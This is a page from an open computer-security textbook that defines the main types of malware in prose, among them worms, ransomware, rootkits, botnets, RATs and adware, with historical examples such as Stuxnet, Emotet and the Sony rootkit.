Skip to main content

Computer Systems Security Planning for Success

Dr. Jan Pearce, Editor

Section 3.3 Types of Malware

The definition of malware is so broad and new malware is being created daily. This can make it difficult to classify malware. As we go through some basic types, please keep in mind that there is significant overlap. For example, you may encounter ransomware distributed as a virus or ransomware distributed as a trojan. The fact that it is ransomware does not preclude it from being some other type of malware as well.
🔗

Subsection 3.3.1 Worms, Viruses, and Trojans

Worms, Viruses, and Trojans are all types of malware that are often confused with one another. The main difference between these three types of malware is how they spread and what they do once they have infected a host. Worms are self-propagating programs that spread without user interaction. Their code is typically stored within an independent object, such as a hidden executable file. Worms often do not severely damage their host, as they are concerned with rapid, exponential spreading.
🔗

Example 3.3.1. Stuxnet.

Stuxnet was a 2010 worm that specifically targeted Iranian nuclear facilities. The worm used an unprecedented four zero-day attacks and was designed to spread via USB flash drives and Remote Procedure Calls (RPCs). In this way it didn’t just rely on networks to propagate. Ultimately Stuxnet’s payload targeted the code used to program PLC devices that control motors and make them spin too fast, destroying the centrifuges. Stuxnet also employed an impressive rootkit to cover its tracks. Given the level of sophistication Stuxnet is believed to have been developed by the US and Israel.
🔗
🔗
Viruses typically require user interaction, such as copying and infected file from one machine to another, and store their code inside another file on a machine. An executable file may be infected by having the virus code added a separate page that executes before the standard program code. Viruses can be quite damaging to the host as they may take significant resources to spread locally. The term virus is also an unfortunately overloaded one. Due to it’s popularity it is often used by some lower-skill threat actors to refer to many different types of malware.
🔗

Example 3.3.2. Concept Virus.

The Concept virus was the first example of a Microsoft Word macro virus. The virus hid itself inside Microsoft Word files and used Word’s embedded macro language to perform its replication tasks. Viruses were later created for Excel and other programs that had sufficiently sophisticated yet ultimately insecure internal scripting languages.
🔗
🔗
A trojan is a form of malware that disguises itself as legitimate software. It does not have to rely on a software exploit as much as it exploits users into installing, running, or giving extra privileges to the malicious code. Trojans are the most popular kind of malware as they can be used as an attack vector for many other payloads. The name comes from Greek mythology, where a Trojan horse was disguised as a gift and given to a besieged town. Within the large horse were secret troops who came out in the middle of the night and opened the town gates.
🔗

Example 3.3.3. Emotet.

Emotet is a banking trojan from 2014 that spread through emails. It made use of malicious links or macro-enabled documents to make the user download its code. Emotet has been one of the most costly and destructive pieces of malware currently averaging about one million in incident remediation. It continues to be adapted to avoid detection and make use of even more sophisticated malware.
🔗
🔗
🔗

Subsection 3.3.2 Ransomware

A screenshot of the WannaCry ransomware demand note, titled "Wana Decrypt0r 2.0," showing the ransom message and payment instructions.
This is a screenshot of the WannaCry ransomware attack’s demand screen, known as "Wana Decrypt0r 2.0." The window informs the user that their files have been encrypted and demands a ransom payment in Bitcoin to recover them. It typically displays the ransom amount (e.g., $300 or $600), Bitcoin payment addresses, and countdown timers indicating when the payment amount will increase and when the files will be permanently lost if the ransom is not paid. The message often includes sections explaining what happened to the files and how to proceed with payment.
🔗
Figure 3.3.4. Wana Decrypt0r Malware Screen
🔗
Wana Decrypt0r screenshot
 1 
en.wikipedia.org/wiki/File:Wana_Decrypt0r_screenshot.png
is used under fair use.
🔗
Ransomware is a type of malware that encrypts files and demands a ransom to decrypt them. Modern ransomware uses symmetric encryption to the files quickly and then encrypts the symmetric key asymmetrically using a hard-coded public key for which the threat actor has the corresponding private key. When the ransom is paid, typically via cryptocurrency, the threat actor can decrypt the symmetric key using their private key and the user can use the symmetric key to decrypt the files.
🔗
Ransomware is considered a data breach in the data is often exfiltrated as well. It is also worth noting that when the ransom is paid, there is no guarantee that the threat actor will actually begin the decryption process. Typical targets of ransomware include corporate infrastructure and health care systems although ransomware may also be spread indeterminately. The payout of ransoms can be a large money-making enterprise so many APTs or criminal groups may employ its use. Ransomware is considered the biggest threat to cyber stability today.
🔗
🔗

Subsection 3.3.3 Spyware

Malware specifically designed for espionage/data theft is known as spyware. Like ransomware, spyware can also have a monetary payoff for the threat actor. Actors may use extortion to demand payment or the data will be leaked. This typically means either sold on the dark web or publicly posted. Once again, given the possibility of monetary gain, spyware is often associated with criminal groups. APTs may use spyware as well to obtain secrets of national importance.
🔗
Customer data, trade secrets, proprietary data, and government secrets are all targets of spyware. Even outside of governments systems, in the corporate setting, spyware is still a major threat.
🔗
A flowchart illustrating the execution and persistence mechanism of fileless malware, starting from a spam email link.
This diagram illustrates the typical attack chain of fileless malware. It begins with a user clicking a malicious link in a spam email, which leads to a website loading a JavaScript exploit. This exploit then triggers shellcode that executes a PowerShell one-liner to download and run the main payload directly in memory, using scripts and executables stored remotely. The malware achieves persistence by creating an auto-start registry entry, ensuring the payload is re-run if the machine is restarted. This method avoids writing malicious files to disk, making detection harder.
🔗
Figure 3.3.5. Typical Attack Chain of Fileless Malware
🔗
Malware is often detected by scanning storage for files that match a particular hash or by looking in files to see if they contain patterns. Both of these detection techniques rely on the malware being stored in a file. Fileless malware attempts to avoid detection by leaving no footprint in the file system. This type of malware uses legitimate processes to load itself into memory, often with a registry key created to reload every time the machine is restarted. This creates a persistent, hard-to-detect type of malware that is often used by sophisticated threat actors such as APTs and criminal groups.
🔗
🔗

Subsection 3.3.4 Cryptojacking

Crypto currencies utilizing proof-of-work algorithms have made it easier than ever for programs to convert processor cycles into money. Certain types of malware capitalize on this by mining cryptocurrency in the background on a users machine. This theft of power and resources can result income for the malware distributor when the funds from mining are deposited into their online wallet.
🔗
Cryptojacking is more popular than ever, especially considering that large botnets of infected machines have already been created. Cryptojacking creates a simpler path to monetization for malicious actors who may already have control of many compromised machines.
🔗
🔗

Subsection 3.3.5 Rootkit

A rootkit is a secret program designed to give back door access to a system. They are designed to remain hidden and may even actively disable or circumvent security software. Due to their low-level nature, many rootkits can be difficult to detect and even more difficult to remove.
🔗
A diagram showing the different system layers where rootkits can operate, from firmware to application level.
This diagram illustrates the various layers within a computer system where rootkits can be installed. Starting from the lowest level, it shows "Physical Hardware," followed by "Firmware" (where a Firmware Rootkit can reside), then "Bootloader" (targeted by Bootloader Rootkits), "Kernel" (compromised by Kernel-mode Rootkits), and finally "User Space" (where Application Rootkits operate). The diagram visually represents how deeper-level rootkits are harder to detect and remove as they are embedded in more fundamental parts of the system.
🔗
Figure 3.3.6. Rootkits are often classified in accordance with the layer in which they are hidden.
🔗

Subsubsection 3.3.5.1 Firmware Rootkit

Firmware is code that a hardware device uses to run. It is often a thin layer of commands used for setting up and interfacing with the device. A firmware rootkit may reside in the BIOS of a motherboard and can be very difficult to remove.
🔗
🔗

Subsubsection 3.3.5.2 Bootloader Rootkit

A bootloader prepares the system to boot an operating system kernel, typically by loading the kernel into memory. A bootloader rootkit may hijack this process to load itself into separate memory space or manipulate the kernel being loaded.
🔗
🔗

Subsubsection 3.3.5.3 Kernel-mode Rootkit

Many operating system kernels, including Linux, have the ability to load dynamic modules. These kernel modules have complete access to OS kernel operations. A kernel-mode rootkit can be difficult to detect live as the OS kernel being given the instructions to detect the rootkit can no longer be trusted.
🔗
🔗

Subsubsection 3.3.5.4 Application Rootkit

An application or user-mode rootkit is usually installed as an application that runs in the background with administrative privileges. These rootkits are typically the easiest to develop and deploy, a low-level knowledge of the hardware the system is using is not required, but they are also the easiest to detect and remove.
🔗
Example 3.3.7. Sony Rootkit.
In 2005 Sony released CDs for their music software with an application rootkit designed to run on Microsoft Windows systems. The rootkit ran persistently in the background, slowing systems, and did not have an uninstaller to remove the program. It was designed to prevent the OS from copying information from audio CDs, but it also opened up several security holes that could be exploited by other malware. Ultimately the rootkit led to several class-action lawsuits against Sony BMG and a led to a settlement with the Federal Trade Commission that required Sony to reimburse customers who reported damages from the rootkit.
🔗
🔗
🔗

Subsection 3.3.5.1 Botnet

A botnet is a network of exploited hosts controlled by a single party. These hosts may be desktop computers, servers, or even internet of things (IoT) devices. Botnets are often used in large-scale distributed denial of service (DDoS) attacks where the nature of the attack is to have many machines flooding a single machine with traffic. Botnets may also be used to send spam emails as their access to SMTP email relay may vary depending on their internet service provider (ISP).
🔗
Bots are typically controlled through a command and control (C2, C&C) server. While this C2 server may use a custom protocol, it is far more typical for modern botnets to rely on other infrastructure. C2 traffic can use SSH, HTTP, Internet Relay Chat (IRC), or even Discord to send commands to bots and receive data from bots.
🔗
🔗
🔗

Subsection 3.3.6 RAT

RAT stands for Remote Access Trojan an it is used to gain full access and control of a remote target. The malware distributor can browse the files on a computer, send keystrokes and mouse movements, view the screen, and/or monitor the input from the microphone and camera. RATs often actively bypass security controls and as such they may be difficult to detect.
🔗
🔗

Subsection 3.3.7 Adware / Potentially Unwanted Programs (PUP)

Adware is malware that is designed to track user behavior and deliver unwanted, sometimes intrusive, tailored ads. Adware may slow down a system and/or add ad walls to sites. This type of malware often targets a users web browser.
🔗
Potentially Unwanted Programs (PUP) are typically downloaded as part of the install of another program. Commons PUPs are browser toolbars, PDF readers, compression utilities, or browser extensions. These programs may have adware/spyware components in them and can also slow down a system.
🔗
🔗
You have attempted 1 of 1 activities on this page.
🔗
PrevTopNext